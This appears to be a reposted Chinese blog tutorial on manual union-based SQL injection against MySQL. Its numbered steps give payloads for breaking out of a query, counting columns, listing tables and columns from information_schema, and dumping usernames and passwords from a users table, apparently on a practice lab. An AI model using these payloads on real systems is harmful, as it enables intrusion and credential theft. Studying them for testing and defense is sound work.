码迷,mamicode.com
首页 > 数据库 > 详细

mysql手工注入步骤

时间:2016-09-11 18:32:28      阅读:398      评论:0      收藏:0      [点我收藏+]

标签:

1.一般用 ‘  "  ) 等符号来闭合,再用%23(即#)来注释后面语句。

2.查找数据库,先用order by n猜字段,再用union select 1,2,3 ...n%23来查询。

技术分享

union select 1,2,database()%23

技术分享

3.利用information_schema库中tables这张表,查mysql数据库中的第一个表。

select table_name from information_schema.tables where table_schema=‘mysql‘ limit 0,1;

技术分享

union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security‘%23

技术分享

4.利用information_schema库中columns这张表,查mysql数据库中user表中的第一列名。

select column_name from information_schema.columns where table_schema=‘mysql‘and table_name=‘user‘ limit 0,1;

技术分享

union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘%23

技术分享

5.知道库名,表名,列名直接查数据了

union select 1,group_concat(username),group_concat(password) from users%23

技术分享

mysql手工注入步骤

标签:

原文地址:http://www.cnblogs.com/Dleo/p/5862250.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!